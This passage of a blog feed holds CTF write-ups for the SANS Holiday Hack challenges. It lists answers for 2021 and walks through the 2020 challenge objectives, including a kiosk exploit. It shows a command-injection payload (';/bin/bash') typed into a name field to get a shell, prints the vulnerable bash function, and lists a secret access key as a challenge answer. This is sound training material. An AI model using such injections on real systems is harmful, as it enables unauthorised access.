&lt;p&gt;The wayward elf was &lt;code&gt;Piney Sappington&lt;/code&gt; during my run.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;Turn up the heat to defrost the entrance to Frost Tower.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We set the temperature to &lt;code&gt;1337&lt;/code&gt; by abusing the API without
authentication.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;Test the security of Jack Frost's slot machines. What does the Jack Frost
Tower casino security team threaten to do when your coin total exceeds 1000?
Submit the string in the server &lt;code&gt;data.response&lt;/code&gt; element.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The &lt;code&gt;data.response&lt;/code&gt; contains the string &lt;code&gt;I'm going to have some
bouncer trolls bounce you right out of this casino!&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;Assist the elves in reverse engineering the strange USB device.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The username involved in this attack is &lt;code&gt;ickymcgoop&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;Complete the Shellcode Primer in Jack's office. According to the last
challenge, what is the secret to KringleCon success? &amp;quot;All of our speakers
and organizers, providing the gift of ____, free to the community.&amp;quot;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The string in &lt;code&gt;/var/northpolesecrets.txt&lt;/code&gt; is &lt;code&gt;Secret to KringleCon
success: all of our speakers and organizers, providing the gift of cyber
security knowledge, free to the community.&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;Investigate the stolen &lt;a class="reference external" href="https://printer.kringlecastle.com/"&gt;Kringle Castle printer&lt;/a&gt;.
Get shell access to read the contents of &lt;code&gt;/var/spool/printer.log&lt;/code&gt;.
What is the name of the last file printed (with a &lt;code&gt;.xlsx&lt;/code&gt; extension)?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The last file printed with an &lt;code&gt;.xlsx&lt;/code&gt; extension is
&lt;code&gt;Troll_Pay_Chart.xlsx&lt;/code&gt;&lt;/p&gt;
&lt;ol class="arabic simple" start="8"&gt;
&lt;li&gt;Obtain the secret sleigh research document from a host on the Elf University
domain. What is the first secret ingredient Santa urges each elf and
reindeer to consider for a wonderful holiday season? Start by registering as
a student on the &lt;a class="reference external" href="https://register.elfu.org/"&gt;ElfU Portal&lt;/a&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The first ingredient is &lt;code&gt;Kindness&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="9"&gt;
&lt;li&gt;Help Angel Candysalt solve the Splunk challenge in Santa's great hall. Fitzy
Shortstack is in Santa's lobby, and he knows a few things about Splunk. What
does Santa call you when when you complete the analysis?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Santa calls us a &lt;code&gt;whiz&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="10"&gt;
&lt;li&gt;What is the secret access key for the &lt;a class="reference external" href="https://apply.jackfrosttower.com/"&gt;Jack Frost Tower job applications server&lt;/a&gt;?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The secret access key is &lt;code&gt;CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="11"&gt;
&lt;li&gt;A human has accessed the Jack Frost Tower network with a non-compliant
host. &lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/jackfrosttower-network.zip"&gt;Which three trolls complained about the human&lt;/a&gt;?
Enter the troll names in alphabetical order separated by spaces.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The trolls are called &lt;code&gt;Flud&lt;/code&gt;, &lt;code&gt;Hagg&lt;/code&gt;, and &lt;code&gt;Yaqh&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="12"&gt;
&lt;li&gt;Investigate &lt;a class="reference external" href="https://staging.jackfrosttower.com/"&gt;Frost Tower's website for security issues&lt;/a&gt;.
&lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/frosttower-web.zip"&gt;This source code will be useful in your analysis&lt;/a&gt;.
In Jack Frost's TODO list, what job position does Jack plan to offer Santa?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Jack wants to offer Santa a &lt;code&gt;clerk&lt;/code&gt; job position.&lt;/p&gt;
&lt;ol class="arabic simple" start="13"&gt;
&lt;li&gt;Write your first FPGA program to make a doll sing.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We got our FPGA program to output custom frequencies.&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>SANS Christmas Challenge 2020</title><link href="https://allyourbase.utouch.fr/posts/2021/01/11/sans-christmas-challenge-2020/" rel="alternate"></link><published>2021-01-11T00:00:00+01:00</published><updated>2021-01-11T00:00:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2021-01-11:/posts/2021/01/11/sans-christmas-challenge-2020/</id><summary type="html">&lt;img alt="sans_christmas_challenge_2020_logo.png" class="align-center" src="/images/sans-christmas-challenge-2020/sans_christmas_challenge_2020_logo.png" /&gt;
&lt;p&gt;Oh, the COVID is frightful,&lt;/p&gt;
&lt;p&gt;But KringleCon is so delightful,&lt;/p&gt;
&lt;p&gt;And since we must all stay home,&lt;/p&gt;
&lt;p&gt;Let it pwn! Let it pwn! Let it pwn!&lt;/p&gt;
&lt;p&gt;Here's my write-up for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2020/"&gt;2020 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id1"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-1-uncover-santa-s-gift-list" id="id2"&gt;Objective 1: Uncover Santa's Gift List&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-2" id="id3"&gt;Objective 2:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#shinny-upatree-s-cranberry-pi-challenge" id="id4"&gt;Shinny Upatree's Cranberry …&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</summary><content type="html">&lt;img alt="sans_christmas_challenge_2020_logo.png" class="align-center" src="/images/sans-christmas-challenge-2020/sans_christmas_challenge_2020_logo.png" /&gt;
&lt;p&gt;Oh, the COVID is frightful,&lt;/p&gt;
&lt;p&gt;But KringleCon is so delightful,&lt;/p&gt;
&lt;p&gt;And since we must all stay home,&lt;/p&gt;
&lt;p&gt;Let it pwn! Let it pwn! Let it pwn!&lt;/p&gt;
&lt;p&gt;Here's my write-up for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2020/"&gt;2020 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id1"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-1-uncover-santa-s-gift-list" id="id2"&gt;Objective 1: Uncover Santa's Gift List&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-2" id="id3"&gt;Objective 2:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#shinny-upatree-s-cranberry-pi-challenge" id="id4"&gt;Shinny Upatree's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#investigate-s3-bucket" id="id5"&gt;Investigate S3 Bucket&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-3" id="id6"&gt;Objective 3:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sugarplum-mary-s-cranberry-pi-challenge" id="id7"&gt;Sugarplum Mary's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#point-of-sale-password-recovery" id="id8"&gt;Point-of-Sale Password Recovery&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-4" id="id9"&gt;Objective 4:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#pepper-minstix-s-cranberry-pi-challenge" id="id10"&gt;Pepper Minstix's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#operate-the-santavator" id="id11"&gt;Operate the Santavator&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#first-method-finding-the-bits-and-bobs" id="id12"&gt;First method: finding the bits and bobs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#second-method-pretending-we-have-the-bits-and-bobs" id="id13"&gt;Second method: pretending we have the bits and bobs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#third-method-who-needs-bits-and-bobs-anyway" id="id14"&gt;Third method: who needs bits and bobs, anyway&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-5" id="id15"&gt;Objective 5:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#bushy-evergreen-s-cranberry-pi-challenge" id="id16"&gt;Bushy Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#opening-the-door" id="id17"&gt;Opening the door&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#repairing-the-vending-machines" id="id18"&gt;Repairing the vending machines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#turning-the-lights-on" id="id19"&gt;Turning the lights on&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#misty-candycane-regex-challenge" id="id20"&gt;Misty Candycane regex Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#open-hid-lock" id="id21"&gt;Open HID Lock&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-6-splunk-challenge" id="id22"&gt;Objective 6: Splunk Challenge&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answering-the-training-questions" id="id23"&gt;Answering the training questions&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#first-question" id="id24"&gt;First question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#second-question" id="id25"&gt;Second question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#third-question" id="id26"&gt;Third question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fourth-question" id="id27"&gt;Fourth question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fifth-question" id="id28"&gt;Fifth question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sixth-question" id="id29"&gt;Sixth question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#seventh-question" id="id30"&gt;Seventh question&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answering-the-challenge-question" id="id31"&gt;Answering the challenge question&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-7" id="id32"&gt;Objective 7:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#wunorse-openslae-s-cranberry-pi-challenge" id="id33"&gt;Wunorse Openslae's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#solve-the-sleigh-s-can-d-bus-problem" id="id34"&gt;Solve the Sleigh's CAN-D-BUS Problem&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-8" id="id35"&gt;Objective 8:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#holly-evergreen-s-cranberry-pi-challenge" id="id36"&gt;Holly Evergreen's Cranberry Pi challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#broken-tag-generator" id="id37"&gt;Broken Tag Generator&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#all-the-dead-ends-yay" id="id38"&gt;All the dead ends, yay!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-right-solution" id="id39"&gt;The right solution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-9" id="id40"&gt;Objective 9:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#alabaster-snowball-s-cranberry-pi-challenge" id="id41"&gt;Alabaster Snowball's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#arp-shenanigans" id="id42"&gt;ARP Shenanigans&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-10-defeat-fingerprint-sensor" id="id43"&gt;Objective 10: Defeat Fingerprint Sensor&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-11" id="id44"&gt;Objective 11:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#naughty-nice-list-with-blockchain-investigation-part-1" id="id45"&gt;Naughty/Nice List with Blockchain Investigation Part 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#naughty-nice-list-with-blockchain-investigation-part-2" id="id46"&gt;Naughty/Nice List with Blockchain Investigation Part 2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#conclusion" id="id47"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answer-to-the-questions" id="id48"&gt;Answer to the questions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id1"&gt;Introduction&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A new KringleCon is taking place, and it's being hosted at Santa's new castle.&lt;/p&gt;
&lt;p&gt;Santa's castle is under construction to accommodate for KringleCon's growing
population of attendees. However, the elves seem to think that Santa has been
behaving rather strangely, especially since Jack Frost offered him a portrait.
In fact, isn't it weird that Jack Frost is here, since the Tooth Fairy seems
to have colluded with him to sabotage last year's KringleCon?&lt;/p&gt;
&lt;p&gt;This requires some investigation!&lt;/p&gt;
&lt;p&gt;Here are the questions we must answer:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;There is a photo of Santa's Desk on that billboard with his personal gift
list. What gift is Santa planning on getting Josh Wright for the holidays?&lt;/li&gt;
&lt;li&gt;When you unwrap the over-wrapped file, what text string is inside the
package?&lt;/li&gt;
&lt;li&gt;Help Sugarplum Mary in the Courtyard find the supervisor password for the
point-of-sale terminal. What's the password?&lt;/li&gt;
&lt;li&gt;Talk to Pepper Minstix in the entryway to get some hints about the
Santavator.&lt;/li&gt;
&lt;li&gt;Open the HID lock in the Workshop.&lt;/li&gt;
&lt;li&gt;Access the Splunk terminal in the Great Room. What is the name of the
adversary group that Santa feared would attack KringleCon?&lt;/li&gt;
&lt;li&gt;Jack Frost is somehow inserting malicious messages onto the sleigh's CAN-D
bus. We need you to exclude the malicious messages and no others to fix the
sleigh.&lt;/li&gt;
&lt;li&gt;Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is
in the environment variable &lt;code&gt;GREETZ&lt;/code&gt;?&lt;/li&gt;
&lt;li&gt;Go to the NetWars room on the roof and help Alabaster Snowball get access
back to a host using ARP. Retrieve the document at &lt;code&gt;/NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt&lt;/code&gt;.
Who recused herself from the vote described on the document?&lt;/li&gt;
&lt;li&gt;Bypass the Santavator fingerprint sensor. Enter Santa's office without
Santa's fingerprint.&lt;/li&gt;
&lt;li&gt;a. Even though the chunk of the blockchain that you have ends with block
129996, can you predict the nonce for block 130000?&lt;/li&gt;
&lt;/ol&gt;
&lt;ol class="arabic simple" start="11"&gt;
&lt;li&gt;b. The SHA256 of Jack's altered block is: &lt;code&gt;58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&lt;/code&gt;.
If you're clever, you can recreate the original version of that block by
changing the values of only 4 bytes. Once you've recreated the original
block, what is the SHA256 of that block?&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-1-uncover-santa-s-gift-list"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id2"&gt;Objective 1: Uncover Santa's Gift List&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We are greeted at the gondola by Jingle Ringford:&lt;/p&gt;
&lt;img alt="jingleringford.png" class="align-center" src="/images/sans-christmas-challenge-2020/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome! Hop in the gondola to take a ride up the mountain to Exit 19:
Santa's castle!&lt;/p&gt;
&lt;p&gt;Santa asked me to design the new badge, and he wanted it to look really
cold - like it was frosty.&lt;/p&gt;
&lt;p&gt;Click your badge (the snowflake in the center of your avatar) to read your
objectives.&lt;/p&gt;
&lt;p&gt;If you'd like to chat with the community, join us on Discord!&lt;/p&gt;
&lt;p&gt;We have specially appointed Kringle Koncierges as helpers; you can hit them
up for help in the #general channel!&lt;/p&gt;
&lt;p&gt;If you get a minute, check out Ed Skoudis' official intro to the con!&lt;/p&gt;
&lt;p&gt;Oh, and before you head off up the mountain, you might want to try to
figure out what's written on that advertising bilboard.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Behind the gondola, we can see said billboard:&lt;/p&gt;
&lt;img alt="billboard.png" class="align-center" src="/images/sans-christmas-challenge-2020/billboard.png" /&gt;
&lt;p&gt;We can see that a gift list is on Santa's desk, but it's been twirled. We can
use GIMP to try and untwirl it, so that we can see who will get what.&lt;/p&gt;
&lt;p&gt;First, let's use the free-hand selection to select the gift list:&lt;/p&gt;
&lt;img alt="billboard_gimp_1.png" class="align-center" src="/images/sans-christmas-challenge-2020/billboard_gimp_1.png" /&gt;
&lt;p&gt;Then, let's use the twirl effect, under &lt;code&gt;Filters &amp;gt; Distort &amp;gt; Whirl and Pinch&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="billboard_gimp_2.png" class="align-center" src="/images/sans-christmas-challenge-2020/billboard_gimp_2.png" /&gt;
&lt;p&gt;Oh boy, okay, it's not the prettiest correction, but we can make out what it
says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Ed - Two front teeth&lt;/p&gt;
&lt;p&gt;- OU Jersey&lt;/p&gt;
&lt;p&gt;Jeremy - Blanket&lt;/p&gt;
&lt;p&gt;Brian -&lt;/p&gt;
&lt;p&gt;Josh Wright - Proxmark&lt;/p&gt;
&lt;p&gt;Clay - Darth Vader Suit&lt;/p&gt;
&lt;p&gt;Tad - Holiday Lights&lt;/p&gt;
&lt;p&gt;Phil - Stuffed Pikachu&lt;/p&gt;
&lt;p&gt;Jerry - Trip to North Pole&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So Santa is planning on offering a &lt;code&gt;Proxmark&lt;/code&gt; to Josh Wright, nice!&lt;/p&gt;
&lt;p&gt;Now, let's ride the gondola!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-2"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id3"&gt;Objective 2:&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We finally arrive at Santa's castle:&lt;/p&gt;
&lt;img alt="santa.png" class="align-center" src="/images/sans-christmas-challenge-2020/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hello and welcome to the North Pole!&lt;/p&gt;
&lt;p&gt;We’re super excited about this year’s KringleCon 3: French Hens.&lt;/p&gt;
&lt;p&gt;My elves have been working all year to upgrade the castle.&lt;/p&gt;
&lt;p&gt;It was a HUGE construction project, and we’ve nearly completed it.&lt;/p&gt;
&lt;p&gt;Please pardon the remaining construction dust around the castle and enjoy
yourselves!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There are also three French hens:&lt;/p&gt;
&lt;img alt="pierre.png" src="/images/sans-christmas-challenge-2020/pierre.png" /&gt;
&lt;img alt="marie.png" src="/images/sans-christmas-challenge-2020/marie.png" /&gt;
&lt;img alt="jeanclaude.png" src="/images/sans-christmas-challenge-2020/jeanclaude.png" /&gt;
&lt;p&gt;&lt;em&gt;Pierre, Marie, and Jean-Claude say&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Bonjour !&lt;/p&gt;
&lt;p&gt;Joyeuses fêtes !&lt;/p&gt;
&lt;p&gt;Jacques DuGivre !&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="shinny-upatree-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id4"&gt;Shinny Upatree's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
Welcome to our castle, we're so glad to have you with us!
Come and browse the kiosk; though our app's a bit suspicious.
Poke around, try running bash, please try to come discover,
Need our devs who made our app pull/patch to help recover?
Escape the menu by launching /bin/bash
&lt;/pre&gt;
&lt;p&gt;We press enter, and we are greeted by a menu. We have several options, such as
displaying the castle's map, or the code of conduct, but the fourth option,
printing the name badge, seems to be the most interesting:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit
Please select an item from the menu by entering a single number.
Anything else might have ... unintended consequences.
Enter choice [1 - 5] 4
Enter your name (Please avoid special characters, they cause some weird errors)...useless
 _________
&amp;lt; useless &amp;gt;
 ---------
  \
   \   \_\_    _/_/
    \      \__/
           (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||
Press [Enter] key to continue...
&lt;/pre&gt;
&lt;p&gt;We input our name, wich seems to be passed as an argument to &lt;code&gt;cowsay&lt;/code&gt;
(or &lt;code&gt;reindeersay&lt;/code&gt; or something). And we're told to avoid special
characters... So let's input special characters!&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Enter your name (Please avoid special characters, they cause some weird errors)...; ls -lh
 _______________________
&amp;lt; Santa's Little Helper &amp;gt;
 -----------------------
  \
   \   \_\_    _/_/
    \      \__/
           (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||
total 4.0K
-rwxr-xr-x 1 root root 2.5K Dec  6 12:24 welcome.sh
&lt;/pre&gt;
&lt;p&gt;As you can see, our payload after the semi-colon, &lt;code&gt;ls -lh&lt;/code&gt; was executed.
The initial prompt told us to execute &lt;code&gt;/bin/bash&lt;/code&gt;, so let's oblige:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Enter your name (Please avoid special characters, they cause some weird errors)...;/bin/bash
 _______________________
&amp;lt; Santa's Little Helper &amp;gt;
 -----------------------
  \
   \   \_\_    _/_/
    \      \__/
           (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||
   ___                                                      _
  / __|   _  _     __      __      ___     ___     ___     | |
  \__ \  | +| |   / _|    / _|    / -_)   (_-&amp;lt;    (_-&amp;lt;     |_|
  |___/   \_,_|   \__|_   \__|_   \___|   /__/_   /__/_   _(_)_
_|&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;|_|&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;|_|&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;|_|&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;|_|&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;|_|&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;|_|&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;|_| &amp;quot;&amp;quot;&amp;quot; |
&amp;quot;`-0-0-'&amp;quot;`-0-0-'&amp;quot;`-0-0-'&amp;quot;`-0-0-'&amp;quot;`-0-0-'&amp;quot;`-0-0-'&amp;quot;`-0-0-'&amp;quot;`-0-0-'
Type 'exit' to return to the menu.
shinny&amp;#64;a15f68a2d576:~$
&lt;/pre&gt;
&lt;p&gt;And bingo, we have a shell! We can even take a look inside &lt;code&gt;welcome.sh&lt;/code&gt;
to see the vulnerable function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;four&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
  &lt;span class="nb"&gt;read&lt;/span&gt; -r -p &lt;span class="s2"&gt;&amp;quot;Enter your name (Please avoid special characters, they cause some weird errors)...&amp;quot;&lt;/span&gt; name
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt; -z &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="nv"&gt;$name&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then&lt;/span&gt;
    &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Santa\&amp;#39;s Little Helper&amp;quot;&lt;/span&gt;
  &lt;span class="k"&gt;fi&lt;/span&gt;
&lt;span class="hll"&gt;  bash -c &lt;span class="s2"&gt;&amp;quot;/usr/games/cowsay -f /opt/reindeer.cow &lt;/span&gt;&lt;span class="nv"&gt;$name&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
&lt;/span&gt;  pause
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can even see that there is a &lt;code&gt;surprise&lt;/code&gt; command, displaying the
content of &lt;code&gt;/opt/plant.txt&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;surprise&lt;span class="o"&gt;(){&lt;/span&gt;
  cat /opt/plant.txt
  &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Sleeping for 10 seconds..&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; sleep &lt;span class="m"&gt;10&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;shinny@913bd6bfa881:~$&lt;/span&gt; cat /opt/plant.txt
&lt;span class="go"&gt;  Hi, my name is Jason the Plant!&lt;/span&gt;
&lt;span class="go"&gt;  ( U&lt;/span&gt;
&lt;span class="go"&gt;   \| )&lt;/span&gt;
&lt;span class="go"&gt;  __|/&lt;/span&gt;
&lt;span class="go"&gt;  \    /&lt;/span&gt;
&lt;span class="go"&gt;   \__/ ejm96&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="investigate-s3-bucket"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id5"&gt;Investigate S3 Bucket&lt;/a&gt;&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Can you help me? Santa has been experimenting with new wrapping technology, and&lt;/span&gt;
&lt;span class="go"&gt;we&amp;#39;ve run into a ribbon-curling nightmare!&lt;/span&gt;
&lt;span class="go"&gt;We store our essential data assets in the cloud, and what a joy it&amp;#39;s been!&lt;/span&gt;
&lt;span class="go"&gt;Except I don&amp;#39;t remember where, and the Wrapper3000 is on the fritz!&lt;/span&gt;
&lt;span class="go"&gt;Can you find the missing package, and unwrap it all the way?&lt;/span&gt;
&lt;span class="go"&gt;Hints: Use the file command to identify a file type. You can also examine&lt;/span&gt;
